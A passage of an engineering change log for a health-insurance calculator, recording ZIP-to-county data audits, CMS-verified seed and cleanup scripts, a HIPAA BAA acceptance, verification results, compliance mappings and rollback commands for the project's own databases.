User report 2026-05-01: ZIP 85001 (downtown Phoenix) returned 404 on prod calculator. CMS confirms 85001 is AZ/Maricopa County. Root cause: Tier 0 (commit 2b24f2c) used Census 2020 ZCTA as universe; Census ZCTA only catalogs ZIPs with significant residential population. PO-Box-only / business-only / single-building ZIPs (85001 is downtown Phoenix PO-Box) are CMS-recognized but Census-blind. Tier 0.5 closes that gap with a USPS-derived universe.

What shipped (data layer) ​

Audit + seed scripts:

  • scripts/db/build-usps-snapshot.js (NEW) - filter zipcodes npm to federal-30+NY (24,945 ZIPs)
  • scripts/db/audit-federal-completeness-tier-0-5.js (NEW) - zip-level gap detection + CMS-confirmed classification
  • scripts/db/retry-cms-errors-tier-0-5.js (NEW) - HTTP 429 retry pass at low concurrency
  • scripts/db/seed-federal-tier-0-5.js (NEW) - per-state / per-class apply with idempotency + rollback marker
  • scripts/db/data/usps-zip-state-2026-05-01.csv (NEW snapshot, 24,945 records, 450 KB)
  • scripts/db/data/federal-tier-0-5-gap-report-2026-05-01.json (NEW Phase 5 triage report, 891 KB)
  • scripts/db/data/federal-tier-0-5-post-apply-confirm-2026-05-01.json (NEW post-apply confirmation, 0 gaps remaining)

Three-batch prod apply (each preceded by mongodump backup per Constraint 1):

  • Batch 1: --class=insertable --state=AZ → 100 docs (incl. 85001) - backup tag pre-tier-0-5-batch-az-insertable-20260501T220646Z
  • Batch 2: --class=discrepancy → 3 docs (KY airports + MH territory) - backup tag pre-tier-0-5-batch-discrepancy-20260501T222700Z
  • Batch 3: --class=insertable,non_residential → 4,260 docs - backup tag pre-tier-0-5-batch-bulk-remaining-20260501T222753Z

All 4,363 docs tagged _seedSource: "federal-tier-0-5-audit-2026-05-01". Pre-apply prod count 48,232 → post-apply 52,595 (delta +4,363 exact).
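The "delta exact" claim is a simple reconciliation of the numbers reported in this entry, and a check along these lines could run after each apply. The variable names and the isDeltaExact helper are illustrative; the figures are the ones stated above.

```typescript
// Batch sizes and collection counts as reported in this entry.
const batchSizes = { azInsertable: 100, discrepancy: 3, bulkRemaining: 4260 };
const preApplyCount = 48232;
const postApplyCount = 52595;

// Planned inserts are the sum of the three batches.
const plannedInserts = Object.values(batchSizes).reduce((sum, n) => sum + n, 0);

// The apply is "delta exact" when observed growth equals planned inserts.
function isDeltaExact(planned: number, before: number, after: number): boolean {
  return after - before === planned;
}

const reconciled = isDeltaExact(plannedInserts, preApplyCount, postApplyCount);
```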

Documentation:

  • docs/validation/tier-0-5-federal-uspscompleteness.md (NEW) - canonical Tier 0.5 audit report + methodology + refresh playbook + limitations
  • docs/infrastructure/data-sources.md - added zipcodes npm as USPS-derived data source + Tier 0.5 step in annual refresh playbook

Verification ​

| Gate | Result |
|---|---|
| 85001 prod live API | ✓ Maricopa County, fips=04013 |
| 85001 plan lookup end-to-end | ✓ 86 plans returned |
| Calculator baseline diff (12 scenarios) | ✓ ZERO DIFFS post-batch-1 + post-batch-3 |
| Tier 0.5 re-run | ✓ 0 gap zips remaining |
| Smoke matrix on 18 inserted ZIPs (10 insertable + 5 non_residential + 3 discrepancy) | ✓ 18/18 correct shape |

Compliance posture impact ​

| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC8.1 - Change management | Three backups taken + verified pre-apply; rollback paths documented + tested via --rollback flag |
| EDE Phase 3 | Data provenance | Source (USPS-derived zipcodes npm + CMS Marketplace API confirmation per gap zip) documented in audit script header + validation doc |

Rollback ​

  • Targeted (preferred): node scripts/db/seed-federal-tier-0-5.js --rollback removes all 4,363 docs by _seedSource marker.
  • Per-class: --class=insertable --rollback, --class=discrepancy --rollback, --class=non_residential --rollback.
  • Nuclear (full collection replace from any backup): mongorestore --uri="$PROD_WRITE_URI" --nsInclude='askflorence.zip_county' --drop ~/Documents/askflorence-db-backups/zip_county/<TAG>/dump.

Outstanding follow-ups ​

  • [ ] S3 backup access for SSO admin role - all 3 backups stored locally because s3://askflorence-data/db-backups/ blocks the SSO admin role at the bucket-policy layer (correct prod hardening - only ECS task role + GitHub OIDC role have access). Need either a scoped bucket-policy allow for the SSO admin role on db-backups/* prefix, or a dedicated assumable backup-role for data-engineering workflows.
  • [ ] Upgrade zipcodes npm to HUD ZIP-County crosswalk before next plan-year refresh - HUD is quarterly-refreshed, richer county-fips data, free + HUD account. Catches the 4 npm-stale extras automatically (75036, 72405, 72713, 75072).
  • [ ] Calculator 404 message refinement - "Zip code not found" is bare; could refine to "ZIP not recognized; check the digits and try your home address" for ZIPs not in DB at all (frontend-side change, separate from Tier 0.5 scope).

2026-05-01T17:44Z — Google Workspace HIPAA BAA accepted + vendor register stub created ​

Actor: taha.abbasi via Google Workspace Admin Console; agent: Claude Opus 4.7 (documentation pass)

Linked: #57 Vendor BAA coverage audit; #71 Phase 12 compliance docs (this is the first artifact landed under that scope).

Why ​

Google Workspace covers our business email (*@askflorence.health), Drive (founder + ops docs), Calendar, Meet, Chat, Cloud Identity (SSO root for Google services). Until today these had no documented BAA — a compliance gap on #57. Acceptance of Google's HIPAA Business Associate Amendment is via Admin Console click-through (Google's standard BAA delivery model — no separate signed PDF exists; the click-through IS the legal acceptance with timestamped audit log).

What shipped ​

Compliance acceptance:

  • Google Workspace/Cloud Identity HIPAA Business Associate Amendment accepted by taha@askflorence.health on May 01, 2026 via admin.google.com/ac/companyprofile/legal → Account settings → Legal & Compliance → Security and Privacy Additional Terms.
  • Coverage applies to the included-functionality services list at workspace.google.com/terms/2015/1/hipaa_functionality (effective 2025-09-30): Gmail, Calendar, Drive (incl Docs/Sheets/Slides/Forms/Vids), Meet, Chat, Sites, Tasks, Keep, Vault, Cloud Identity, Google Cloud Search, Groups, Voice (managed), AppSheet, Apps Script, Gemini app, Gemini in Workspace. Excluded: Gemini in Chrome.

Documentation landed:

  • docs/security-compliance/vendor-register.md (NEW) — canonical vendor / subprocessor register. Tier 1 (direct processors), Tier 2 (transitional), Tier 3 (retired) classification. Maps to SOC 2 CC9.2 + HIPAA §164.314 + EDE Phase 3 SA-9. Open follow-ups list. First artifact under #71 Phase 12 docs scope.
  • docs/infrastructure/evidence/ (NEW directory; landing page was previously README.md, renamed to index.md on 2026-05-11) — evidence inventory + filename conventions + retention policy + cross-references to vendor-register.
  • docs/infrastructure/evidence/google-workspace-hipaa-baa-acceptance-2026-05-01.jpg (saved 2026-05-01, 437 KB) — Admin Console screenshot showing acceptance by taha@askflorence.health on May 01, 2026

Compliance posture impact ​

| Framework | Control | Status |
|---|---|---|
| HIPAA | §164.314(a) — BAA scope | Workspace now covered. Two of three Tier 1 vendors fully documented (AWS, Workspace); MongoDB Atlas BAA collection still pending. |
| SOC 2 | CC9.2 — vendor management | First standing artifact (vendor-register.md) created. CC9.2 evidence path established. |
| EDE Phase 3 | SA-9 — external systems inventory | Subprocessor inventory artifact in place. Per-vendor FedRAMP status documented. |

Outstanding #57 items after this ​

  • [ ] MongoDB Atlas BAA PDF (request from Atlas support) — last Tier 1 BAA still un-collected
  • [x] PostHog: removed via #75 sub-A (2026-05-12, PRs #184/#186). Replacement: OpenPanel + GlitchTip self-hosted = under the AWS Org BAA, no separate analytics-vendor BAA (ADR 0009 / ENG-347, build at #342)
  • [ ] Resend BAA: file in evidence/ for historical record (vendor retired 2026-04-30)

After MongoDB Atlas BAA is collected, #57 can close.

Notes ​

The vendor-register.md is intentionally a living document — expect entries to update with every new vendor adoption, BAA renewal, or retirement. Quarterly review cadence + annual audit-prep cadence both documented in the file's "Update cadence" section.


2026-05-01T20:30Z — Tier 1.5 SBE-state ZIP→County audit harness shipped at 100% match ​

Actor: taha.abbasi via SSO (read-only Atlas + read-only CMS API); agent: Claude Opus 4.7

Linked: Issue #70. Closes: #70. Builds on: corrective seed (01:22Z entry below) + cleanup (02:42Z entry below).

Why ​

The 2026-04-30 corrective seed (commit ccad089) replaced the entire SBE-state side of zip_county with CMS-canonical docs tagged _seedSource: "cms-2026-04-30". The 2026-05-01 cleanup (commit 0241b05) removed the last 12 legacy entries with wrong county FIPS. Together they restored byte-for-byte parity with CMS — but parity requires continuous proof. Tier 1.5 is that proof: a re-runnable audit harness that re-validates the SBE-state side against live CMS the same way Tier 1 re-validates the federal-30 side.

Without this harness, drift between our snapshot and live CMS could silently accumulate (CMS revising county-zip assignments, new zips appearing, occasional CMS data corrections). Issue #70 closes only when the audit can be re-run on demand and shipped at 100% match.

What shipped ​

  • scripts/audit/tier-1-5-sbe-zip-county.js (new, ~210 lines) — read-only audit. Source query: { sbeRedirect: { $exists: true }, countyFips: { $exists: true } } aggregated by zip → 13,053 unique zips. Per-zip, calls CMS /counties/by/zip, filters CMS response to SBE-state counties only (federal-state cross-border counties are owned by Tier 1), compares FIPS sets. Independent state-drift + name-drift checks per matched FIPS. Mirrors Tier 1's structure (BATCH_SIZE=5, 25 rps, ProgressTracker resume, JSON output at repo root). Optional --limit N flag for smoke runs.
  • docs/validation/audit/tier-1-5-sbe-zip-county.md (new) — first-run report at 100% match.
  • docs/validation/audit/methodology.md (modified) — Tier 1.5 added to the tiered structure table; SBE source-of-truth scope updated to reflect that zip→county is now in scope (deeper plan-level data still out); scripts reference table updated.
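The per-zip comparison at the heart of the audit script can be sketched as follows. This is an illustration only: the CmsCounty shape, the compareZip helper, and all FIPS and state values in the example are placeholders, and the real script's CMS response handling is not shown.

```typescript
// Hypothetical slice of a CMS county record.
interface CmsCounty {
  fips: string;
  state: string;
}

interface ZipResult {
  exact: boolean;
  missing: string[]; // FIPS that CMS has but our DB lacks
  extra: string[];   // FIPS that our DB has but CMS lacks
}

// Keep only CMS counties in SBE states, then compare FIPS sets for one zip.
// Federal-state cross-border counties are dropped because Tier 1 owns them.
function compareZip(
  ourFips: string[],
  cmsCounties: CmsCounty[],
  sbeStates: Set<string>,
): ZipResult {
  const cmsFips = new Set(
    cmsCounties.filter((c) => sbeStates.has(c.state)).map((c) => c.fips),
  );
  const ours = new Set(ourFips);
  const missing = Array.from(cmsFips).filter((f) => !ours.has(f)).sort();
  const extra = Array.from(ours).filter((f) => !cmsFips.has(f)).sort();
  return { exact: missing.length === 0 && extra.length === 0, missing, extra };
}

// Placeholder data: one SBE-state county plus one cross-border county in a
// made-up federal state "ZZ" that the filter should ignore.
const sbeStates = new Set(["MD"]);
const crossBorder = compareZip(
  ["SBE-FIPS-1"],
  [
    { fips: "SBE-FIPS-1", state: "MD" },
    { fips: "FED-FIPS-9", state: "ZZ" },
  ],
  sbeStates,
);
```

Comparing sets rather than ordered lists keeps the result independent of the order in which CMS returns counties.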

Apply results ​

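| Run | Zips | Exact | Mismatch | State drift | Name drift | CMS errors | Match rate | Duration |
|---|---|---|---|---|---|---|---|---|
| Smoke (--limit 50) | 50 | 50 | 0 | 0 | 0 | 0 | 100.00% | 6s |
| Full | 13,053 | 13,053 | 0 | 0 | 0 | 0 | 100.00% | 10.6m |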

CMS API stats (full run): 13,073 calls, 13,053 success, 20 retries on transient 503s (all recovered, 0 backoff failures), 180 ms avg latency, 99.85% first-try success rate.

Verification ​

12 former-legacy ZIPs (the ones cleanup commit 0241b05 deleted) re-probed against prod apex /api/counties post-audit — all return correct sbeRedirect:

21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓

User-facing behavior identical to pre-cleanup. CMS-canonical docs continue to serve every ZIP correctly.

Compliance posture ​

| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Audit harness re-validatable on demand; provides documentary evidence that data integrity is verified continuously, not assumed |
| SOC 2 TSC | CC8.1 Change management + CC7.1 Monitoring | New audit added to the methodology + scripts reference; results are reproducible from the script + a fresh CMS snapshot |
| EDE Phase 3 | Data accuracy | 100% match across all 13,053 SBE-state zips proves byte-for-byte CMS parity for the SBE-state slice of zip_county |

Net effect ​

  • Issue #70 closed: SBE-state zip→county data has continuous-audit coverage matching the federal-30 slice.
  • Issue #47 Phase 11 hardening item ticked: the SBE corrective work has its parity proof.
  • Continuous: the harness can be re-run any time (node scripts/audit/tier-1-5-sbe-zip-county.js) — no setup, no fixtures, just live CMS vs live Atlas. Recommend monthly cadence alongside Tier 1.
  • No app-code changes. No DB writes. No deploy. Read-only on Atlas + read-only on CMS API.

Rollback ​

The audit script writes nothing. To "roll back" the audit, simply delete the new files. The change-log entry, the markdown report, the script, and the methodology edits all stand independently — none affect runtime behavior.


2026-05-01T03:55Z — Tier 0 federal ZIP completeness audit + 366 NY multi-county fixes ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7

Linked: Issue #73 Path 2 (closes; parent of Path 1 commit aa2a97a).

Why ​

#73 Path 2 — systematic completeness check of federal-30 + NY ZIP coverage. Path 1 fixed the 3 known gaps surfaced by the SBE corrective seed; Path 2 is the comprehensive Census-vs-DB audit to surface lurking gaps and fix them.

What shipped ​

Code:

  • scripts/db/build-federal-snapshot.js (NEW) — reads Census 2020 ZCTA-County file, filters to federal-30 + NY, writes universe CSV (29,793 rows, 20,627 unique ZIPs).
  • scripts/db/data/federal-zip-state-2020.csv (NEW, committed) — the universe snapshot.
  • scripts/db/audit-federal-completeness.js (NEW) — computes gaps, queries CMS to verify, classifies (insertable/needs-PUF/discrepancy/cms-errors), writes report.
  • scripts/db/data/federal-gap-report-2026-05-01.json (NEW, committed, 467 KB) — full audit report.
  • scripts/db/seed-federal-completeness.js (NEW) — applies insertable class inserts; three modes (--dry-run / --apply / --rollback). Marker _seedSource: "federal-completeness-audit-2026-05-01".
  • docs/validation/tier-0-federal-completeness.md (NEW) — markdown report; SOC 2 evidence artifact.

Audit findings:

| Class | Count | Action |
|---|---|---|
| Insertable | 366 | INSERTED on staging + prod |
| Discrepancy | 451 | Logged only (Census 2020 stale vs current CMS — trust CMS) |
| Extras (DB has, Census doesn't) | 1,353 | Logged only (DB more current than Census 2020 ZCTA) |
| needs-PUF | 0 | (great — no county entirely missing) |
| cms-errors | 0 | (great — clean run) |

All 366 inserts are NY multi-county additions. Pattern: NY ZIPs that already had ≥1 sibling doc but were missing additional counties for multi-county ZIPs. The original NY ingest (load-ny-2026.js, 2026-04-12) loaded primary county per ZIP; this audit added the secondaries.

Apply results identical staging + prod:

  • 366 inserted, 0 already-present, 0 rejected
  • Per-state: NY=366, all other federal-30 states=0

Verification ​

  • Calculator baseline diff (12 scenarios): ZERO DIFFS — pipeline output unchanged
  • Prod consistency check: 30,326 (legacy) + 3 (federal-gap-fix) + 17,537 (SBE) + 366 (this audit) = 48,232 total
  • Smoke matrix on 5 inserted ZIPs (10463, 10470, 10509, 10512, 10940): all return multi-county responses correctly. Pre-fix: single county. Post-fix: 2 counties.
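
The prod consistency check above is a sum-of-provenance-buckets identity. A small sketch of that arithmetic, using the figures from this entry (the `checkCountIdentity` helper and the bucket names are hypothetical):

```javascript
// Hypothetical helper: verifies that per-source doc counts add up to the observed total.
function checkCountIdentity(buckets, observedTotal) {
  const expected = Object.values(buckets).reduce((sum, n) => sum + n, 0);
  return { expected, observedTotal, ok: expected === observedTotal };
}

const prodCheck = checkCountIdentity(
  { legacy: 30326, federalGapFix: 3, sbe: 17537, thisAudit: 366 },
  48232
);
console.log(prodCheck); // { expected: 48232, observedTotal: 48232, ok: true }
```

In a real run the observed total would come from a collection count, and a mismatch would point to inserts or deletions that happened outside the documented seeds.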

Compliance posture

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.312(c) Integrity | Three-layer guards + idempotent insert + 0 modifications to existing docs |
| HIPAA | §164.312(b) Audit controls | Audit report committed to repo as evidence artifact; CloudTrail captures Atlas writes |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Reproducible audit pipeline + dry-run gate + dated change-log entry |
| NIST 800-53 R4 | CA-2 (security assessments) / CM-3 (config change control) | Tier 0 audit becomes a standing control; annual refresh playbook documented |
| EDE Phase 3 | Data provenance | Every insert traceable to (zip, countyFips) Census source + CMS verification |

Rollback

```bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/seed-federal-completeness.js --rollback
```

Removes only docs with _seedSource: "federal-completeness-audit-2026-05-01". Other markers untouched.
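
A sketch of the marker-scoped rollback idea over an in-memory array. The `planRollback` helper is hypothetical; the real script presumably issues an equivalent filter against the collection (for example a `deleteMany` on `_seedSource` with the MongoDB Node driver), but that is an assumption.

```javascript
// Hypothetical sketch: select only docs carrying this seed's marker.
const AUDIT_SEED_SOURCE = "federal-completeness-audit-2026-05-01";

function planRollback(docs, seedSource) {
  const toDelete = docs.filter((d) => d._seedSource === seedSource);
  const toKeep = docs.filter((d) => d._seedSource !== seedSource);
  return { toDelete, toKeep };
}

const rollbackPlan = planRollback(
  [
    { zip: "10463", countyFips: "36005", _seedSource: AUDIT_SEED_SOURCE },
    { zip: "10463", countyFips: "36061" }, // legacy doc, no marker
    { zip: "90001", countyFips: "06037", _seedSource: "cms-2026-04-30" },
  ],
  AUDIT_SEED_SOURCE
);
console.log(rollbackPlan.toDelete.length, rollbackPlan.toKeep.length); // 1 2
```

Because the filter is an exact match on the marker, docs from other seeds and unmarked legacy docs are never candidates for deletion.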

Annual refresh playbook (added to data-sources.md) ​

At plan-year transitions:

  1. Re-pull Census ZCTA file
  2. Re-run build-federal-snapshot.js
  3. Re-run audit-federal-completeness.js
  4. Triage classification (should be ~0 new gaps in steady state)
  5. Apply inserts if gaps found
  6. Append change-log entry

Phase timing (estimate vs actual)

| Phase | Estimate | Actual |
| --- | --- | --- |
| 2: Build federal snapshot | 30 min | 1 min |
| 3: Audit script | 60 min | 2 min |
| 4: Run audit (incl. 13s CMS pass) | 30 min | 2 min |
| 5: Triage results | 30 min | 1 min |
| 6: Build seed + dry-run | 60 min | 2 min |
| 7: Apply staging + prod + smoke | 30 min | 2 min |
| 8: Validation tier | 60 min | 1 min |
| 9: Docs (this entry) + commit + push | 30 min | (this) |
| 10: Status comments + close #73 | 15 min | (next) |
| Total | ~5h | ~12 min so far |

Pattern matches the SBE corrective seed: design-complete coming in → execution mechanical → no surprises.


2026-05-01T02:42Z — Cleanup: deleted 12 legacy fix-stale-zips entries with wrong county FIPS ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7
Linked: Issue #70 (Tier 1.5 SBE ZIP audit harness; unblocks 100% match).

Why ​

The corrective SBE seed (entry below, 01:22Z) inserted CMS-canonical per-county docs alongside 12 legacy entries from scripts/db/fix-stale-zips.js. Live CMS validation confirmed every one of the 12 legacy entries stores a wrong countyFips (the federal-state county the ZIP was originally mis-mapped to during the 2026-04-13 federal-30 ingest). Examples:

| ZIP | Legacy stored | CMS truth |
| --- | --- | --- |
| 21874 | DE/10005 (Sussex) | MD/24045 (Wicomico County) |
| 30165 | AL/01019 (Cherokee) | GA/13115 (Floyd) + GA/13055 (Chattooga) |
| 24622 | WV/54047 (McDowell) | VA/51185 (Tazewell) + VA/51027 (Buchanan) |

(All 12 listed in cleanup script header docstring.)

The legacy entries duplicated the sbeRedirect behavior the CMS-canonical docs already provide. Without deletion, the upcoming Tier 1.5 SBE audit (#70) couldn't hit 100% match — these 12 would permanently fail the (zip, countyFips, state) byte-check against CMS.
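
To illustrate why the legacy entries would fail the audit, here is a hedged sketch of a (zip, countyFips, state) match against a snapshot shaped like `{ zip: [{ countyFips, county, state }, ...] }`. The `auditAgainstSnapshot` function is hypothetical and is not the Tier 1.5 harness itself.

```javascript
// Hypothetical sketch: exact-match check of stored docs against a CMS snapshot.
function auditAgainstSnapshot(docs, snapshot) {
  const mismatches = [];
  for (const doc of docs) {
    const cmsCounties = snapshot[doc.zip] || [];
    const hit = cmsCounties.some(
      (c) => c.countyFips === doc.countyFips && c.state === doc.state
    );
    if (!hit) mismatches.push({ zip: doc.zip, countyFips: doc.countyFips, state: doc.state });
  }
  return { total: docs.length, matched: docs.length - mismatches.length, mismatches };
}

// ZIP 21874 from the table above: the legacy doc stores DE/10005, CMS reports MD/24045.
const auditResult = auditAgainstSnapshot(
  [
    { zip: "21874", countyFips: "10005", state: "DE" }, // legacy entry
    { zip: "21874", countyFips: "24045", state: "MD" }, // CMS-canonical doc
  ],
  { "21874": [{ countyFips: "24045", county: "Wicomico County", state: "MD" }] }
);
console.log(auditResult.matched, auditResult.mismatches.length); // 1 1
```

As long as the legacy doc stays in the collection, a check like this one can never report a full match for that ZIP.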

What shipped ​

New script: scripts/db/cleanup-legacy-fix-stale-zips.js (~250 lines). Three modes (--dry-run / --apply / --rollback). Three safety guards:

  1. Hard-coded list of 12 (zip, countyFips) pairs — no pattern matching.
  2. Pre-delete invariant: refuse to delete unless ≥1 doc with _seedSource: "cms-2026-04-30" AND sbeRedirect exists for the same ZIP. Preserves coverage as invariant.
  3. Marketplace continuity: legacy doc's sbeRedirect.marketplace must match a CMS-seeded doc's marketplace for the same ZIP. Confirms user behavior unchanged.

Targeted by _id (per-doc), not pattern — eliminates over-match risk.
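
The three guards can be sketched as a pure check that runs before each delete. This is an illustration under assumptions: `checkDeleteInvariants` and the document shapes are hypothetical, and only three of the 12 target pairs (the ones shown in the table above) are listed.

```javascript
// Hypothetical sketch of the three guards; not the real cleanup script.
const CMS_SEED_SOURCE = "cms-2026-04-30";

// Guard 1: explicit (zip, countyFips) pairs only. Three of the 12 shown for illustration.
const DELETE_TARGETS = new Set(["21874|10005", "30165|01019", "24622|54047"]);

function checkDeleteInvariants(legacyDoc, docsForZip) {
  if (!DELETE_TARGETS.has(`${legacyDoc.zip}|${legacyDoc.countyFips}`)) {
    return { ok: false, reason: "not on the hard-coded target list" };
  }
  // Guard 2: a CMS-seeded doc with sbeRedirect must already cover the ZIP.
  const cmsDocs = docsForZip.filter(
    (d) => d.zip === legacyDoc.zip && d._seedSource === CMS_SEED_SOURCE && d.sbeRedirect
  );
  if (cmsDocs.length === 0) {
    return { ok: false, reason: "no CMS-seeded sbeRedirect doc for this ZIP" };
  }
  // Guard 3: the redirect target must be unchanged for the user.
  const sameMarketplace = cmsDocs.some(
    (d) => d.sbeRedirect.marketplace === legacyDoc.sbeRedirect.marketplace
  );
  if (!sameMarketplace) return { ok: false, reason: "marketplace mismatch" };
  return { ok: true };
}
```

A delete would proceed only when the result is `{ ok: true }`; any other result leaves the legacy doc in place and surfaces the reason in the dry-run output.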

Apply results

| Cluster | Pre-cleanup total | Deleted | Post-cleanup total | Math |
| --- | --- | --- | --- | --- |
| Staging Atlas | 47,875 | 12 | 47,863 | 30,326 + 0 + 17,537 = 47,863 ✓ |
| Prod Atlas | 47,875 | 12 | 47,863 | 30,326 + 0 + 17,537 = 47,863 ✓ |

Apply order: staging dry-run (12/12 pass invariants) → staging apply (12/12 deleted) → 12-ZIP smoke matrix on stage.askflorence.health (all return correct sbeRedirect) → prod dry-run (identical) → prod apply → prod smoke.

Verification ​

All 12 ZIPs still return correct sbeRedirect post-cleanup on both clusters:

21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓

User experience identical pre/post. The CMS-canonical docs (already inserted by the corrective seed) are now the only source for these ZIPs' redirects.

Compliance posture

| Framework | Control | Posture |
| --- | --- | --- |
| HIPAA | §164.312(c) Integrity | Pre-delete invariants enforce no orphaned ZIPs; per-doc _id targeting prevents over-deletion |
| SOC 2 TSC | CC8.1 Change management | IaC-style script + reviewed apply + dated change-log entry |
| EDE Phase 3 | Data provenance | Every ZIP now has only CMS-canonical docs; byte-for-byte audit parity restored without exemptions |

Rollback

```bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
  --secret-id prod/mongodb/app-write --query SecretString --output text) \
  node scripts/db/cleanup-legacy-fix-stale-zips.js --rollback
```

Re-inserts the 12 legacy entries in their original shape (countyFips + state + sbeRedirect from STATE_BASED_MARKETPLACES). Idempotent — won't double-insert. Safe to run if needed.

Net effect ​

  • Tier 1.5 SBE audit (#70) can now target 100% match across all 17,537 CMS-seeded SBE docs, no exemptions.
  • scripts/db/fix-stale-zips.js retains its 4 PO Box entries (unrelated to SBE redirects, unchanged). The 12 SBE-redirect entries in the file are now orphaned data; the file is left intact for git history but its SBE_REDIRECTS array is no longer the source of truth — superseded by seed-sbe-zips-from-cms.js + the CMS snapshot.

2026-05-01T01:22Z — SBE-state ZIP corrective seed: CMS as source of truth, per-county FIPS, cross-state border ZIPs supported ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7
Linked: Issue #68. Supersedes: the 2026-04-30T17:30Z entry below (broken initial seed).

Why ​

The 2026-04-30T17:30Z seed shipped 13,027 SBE-redirect docs without countyFips, sourced from U.S. Census ZCTA. That violated the system's data-architecture principle: every (zip, countyFips) mapping must match CMS exactly so we can validate byte-for-byte against CMS today and any SBE marketplace later. Three concrete problems:

  1. New SBE docs had no county anchor — couldn't participate in tier-1.5-style audits.
  2. FIPS values, when written, came from Census not CMS — diverging from the canonical source.
  3. The 45 cross-state border ZIPs (NH+ME, DE+MD, VA+WV, NC/VA, TN/KY, MN/SD, etc.) were skipped entirely under the original Guard 2 — the SBE-side of those ZIPs had no coverage at all.

This corrective seed replaces those docs with CMS-authoritative per-county records that carry the FIPS anchor, and adds a per-county doc for every cross-state border ZIP's SBE side.

What shipped ​

Code (corrective ingest pipeline):

  • scripts/db/build-cms-snapshot.js (NEW) — one-shot script that queries CMS Marketplace API /counties/by/zip/{zip} for every ZIP in our SBE coverage universe (13,072 ZIPs from the existing Census-derived universe). 5-concurrent at ~23 req/sec, ~10 min runtime. Resume-capable via checkpoint file. 200 × HTTP 429 events auto-recovered via 5-second backoff.
  • scripts/db/data/sbe-zip-cms-snapshot.json (NEW, 1.2 MB committed) — per-ZIP CMS response: { zip: [{ countyFips, county, state }, ...], ... }. The operational source of truth; production traffic never re-queries CMS for these ZIPs.
  • scripts/db/seed-sbe-zips-from-cms.js (NEW, ~330 lines) — corrective ingest script. Three modes (--dry-run / --apply / --rollback). For each (zip, countyFips) from the snapshot, applies five-way classification: federal-exists (preserve), federal-gap (log), sbe-insert (new doc), sbe-refresh (idempotent), sbe-conflict (log). Marker tag _seedSource: "cms-2026-04-30" on every INSERT enables clean rollback.
  • scripts/db/seed-sbe-zips.js — minor --rollback defect fix (it was dry-run-only). Marked deprecated in header docstring.
  • scripts/db/data/sbe-zip-state-2020.csv — kept in repo as historical lineage; superseded by the CMS snapshot.
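
A sketch of the snapshot-building pattern described above: bounded concurrency, fixed backoff on HTTP 429, and resume from a checkpoint. The function names, the `{ status, counties }` response shape, and the injected `fetchCounties` and `sleep` callbacks are assumptions; the real build-cms-snapshot.js may be structured differently.

```javascript
// Hypothetical sketch: retry one lookup while the injected fetcher reports HTTP 429.
async function fetchWithBackoff(fetchCounties, zip, { backoffMs = 5000, maxRetries = 5, sleep } = {}) {
  const wait = sleep || ((ms) => new Promise((resolve) => setTimeout(resolve, ms)));
  for (let attempt = 0; ; attempt++) {
    const res = await fetchCounties(zip); // assumed shape: { status, counties }
    if (res.status !== 429) return res;
    if (attempt >= maxRetries) {
      throw new Error(`still rate-limited after ${maxRetries} retries: ${zip}`);
    }
    await wait(backoffMs);
  }
}

// Run lookups with at most `concurrency` in flight; ZIPs already in `checkpoint` are skipped.
async function buildSnapshot(zips, fetchCounties, { concurrency = 5, checkpoint = {}, ...retryOpts } = {}) {
  const pending = zips.filter((zip) => !(zip in checkpoint));
  let next = 0;
  async function worker() {
    while (next < pending.length) {
      const zip = pending[next++];
      const res = await fetchWithBackoff(fetchCounties, zip, retryOpts);
      checkpoint[zip] = res.counties; // a real script would also persist this to disk
    }
  }
  await Promise.all(Array.from({ length: concurrency }, () => worker()));
  return checkpoint;
}
```

Passing a previously saved checkpoint object makes a rerun pick up where the last one stopped, which is the resume behavior the bullet describes.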

Code (route + hook for cross-state ZIPs):

  • src/app/api/counties/route.ts — short-circuit only when docs.every((d) => d.sbeRedirect) (truly fully-SBE ZIP). Otherwise return multi-county with per-county sbeRedirect annotation. Mirrors how healthcare.gov surfaces cross-state ZIPs (user picks the county they actually live in).
  • src/lib/types.ts — County.sbeRedirect? added as optional field.
  • src/lib/hooks/use-calculator.ts — post-county-pick: if selected county carries sbeRedirect, set phase=state_marketplace instead of proceeding to /api/eligibility. PostHog event tagged source: "per_county_pick".
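
The route and hook behavior above can be sketched as two small pure functions. Only the `docs.every((d) => d.sbeRedirect)` condition, the `phase=state_marketplace` value, and the two response shapes come from this entry; `buildCountiesResponse`, `nextPhase`, the `"eligibility"` phase name, and returning `null` on a miss are assumptions for illustration.

```javascript
// Hypothetical sketch of the short-circuit rule in /api/counties.
function buildCountiesResponse(docs) {
  if (docs.length === 0) return null; // miss: left to whatever fallback the route uses
  if (docs.every((d) => d.sbeRedirect)) {
    // Fully-SBE ZIP: single redirect. Assumes all docs share the same redirect target.
    return { sbeRedirect: docs[0].sbeRedirect };
  }
  // Mixed ZIP: return every county, annotating only the SBE-side ones.
  return {
    counties: docs.map(({ countyFips, county, state, sbeRedirect }) => ({
      countyFips,
      county,
      state,
      ...(sbeRedirect ? { sbeRedirect } : {}),
    })),
  };
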